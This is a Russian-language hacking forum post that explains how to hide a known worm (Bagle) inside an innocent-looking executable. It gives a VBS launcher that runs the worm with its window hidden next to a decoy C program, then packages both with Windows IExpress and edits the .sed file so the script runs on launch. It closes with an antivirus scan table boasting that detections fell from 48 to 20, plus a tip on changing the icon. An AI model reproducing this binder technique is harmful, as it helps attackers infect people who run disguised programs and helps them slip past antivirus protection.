прячем вредоноса в любом exe

[sata-ata]

откопал тут старый способ)

на удивление метод легален и встроен в винду
берём какой-нить ехе, например, [Только зарегистрированные могут видеть это. ] (чистый, но вот вам на всякий случай [Только зарегистрированные могут видеть это. ])

степень 2 на си

з.ы. только откомпилил, а вт нашёл 5 из 52 XD

c код:

#include <iostream>

#include <windows.h>



using namespace std;



int main() {

            __int64 a=1;

            int n=64;

            for (int i=1; i<n; i++)

                {

                a*=2;

                cout << i << " " << a << "\n";

                }

            system ("pause");

            }

[свернуть]

и какой-нить зловред, например, червячёк [Только зарегистрированные могут видеть это. ] ([Только зарегистрированные могут видеть это. ] (48 из 51))

перемещаем всё на рабочий стол
рядом создаём sbd.vbs:

vb код:

Set wshshell = WScript.CreateObject("WScript.Shell")

wshshell.run "2.exe", 1, False

wshshell.run "Win32.Bagle.CY.exe", 0, False

собсно наш скрипт просто запускает эти проги
wshshell.run имя_проги, отображать(1)_или_нет(0)_окно_ проги, ждать(True)_или_нет(False)_закрыт ия_перед_следующим_действи� �м

а теперь великая встроенная вещь по имени iexpress:

жмём Win+R, затем пишем iexpress

1. далее
2. далее
3. любое название
4. далее
5. далее
6. добавлием наши файлы для объединения в пакет (зловред, 2.ехе и vbs)
7. выбираем прогу при старте, любую, лучше 2.ехе
8. далее
9. далее
10. указываем рабочий стол для сохранения пакета
11. галку на "не перезагружать"
12. далее
13. далее

должны появиться 2 файла
бла-бла.sed
бла-бла.exe

лезем в sed ищем

Код:

AppLaunched=2.exe

меняем на

Код:

AppLaunched=sbd.vbs

(наш скрипт)

снова
жмём Win+R, затем пишем iexpress
но теперь выбираем .sed, сразу после запуска
и пересоздаем пакет на основе нового sed

усё)

з.ы. [Только зарегистрированные могут видеть это. ] нового .exe... нам сбросили до 20 / 52
и я поражён рзультатами!!!

вэтэ кому лень

AVG	I-Worm/Bagle	20140501
Ad-Aware	[email protected]	20140501
Agnitum	Trojan.DL.Bagle.EG	20140501
AntiVir	TR/Bagle.DF	20140501
Antiy-AVL	Trojan/Win32.Llac	20140501
Avast	Win32:Beagle-EG [Wrm]	20140501
ClamAV	Worm.Bagle.Gen-5	20140501
Commtouch	W32/Mitglieder.WINF-4156	20140501
DrWeb	Win32.HLLM.Beagle.35146	20140501
ESET-NOD32	Win32/Bagle.CY	20140501
F-Prot	W32/Mitglieder.FT	20140501
F-Secure	[email protected]	20140501
Ikarus	Win32.Tupac.A	20140501
K7GW	EmailWorm ( 00003b091 )	20140501
Kaspersky	Email-Worm.Win32.Bagle.pac	20140501
MicroWorld-eScan	[email protected]	20140501
NANO-Antivirus	Trojan.Win32.Agent.bobmol	20140501
Norman	Heuristic_Suspicious.gen!r	20140501
Qihoo-360	Trojan.Generic	20140501
VIPRE	Trojan.Win32.Generic.pak!cobra	20140501
AegisLab		20140501
AhnLab-V3		20140501
Baidu-International		20140501
BitDefender		20140501
Bkav		20140428
ByteHero		20140501
CAT-QuickHeal		20140430
CMC		20140429
Comodo		20140501
Emsisoft		20140501
Fortinet		20140430
GData		20140501
Jiangmin		20140501
K7AntiVirus		20140501
Kingsoft		20140501
Malwarebytes		20140501
McAfee		20140501
McAfee-GW-Edition		20140501
Microsoft		20140501
Panda		20140501
Rising		20140501
SUPERAntiSpyware		20140501
Sophos		20140501
Symantec		20140501
TheHacker		20140501
TotalDefense		20140501
TrendMicro		20140501
TrendMicro-HouseCall		20140501
VBA32		20140428
ViRobot		20140501
Zillya		20140501
nProtect		20140430

[свернуть]

з.з.ы. в этом sed очень много настроек, как и в самом iexpress


by [Только зарегистрированные могут видеть это. ], он же s0a

[sata-ata]

ну и конечно
как изменить иконку .exe
существует множество прог и способов для этого

[sata-ata]

ап в топ =)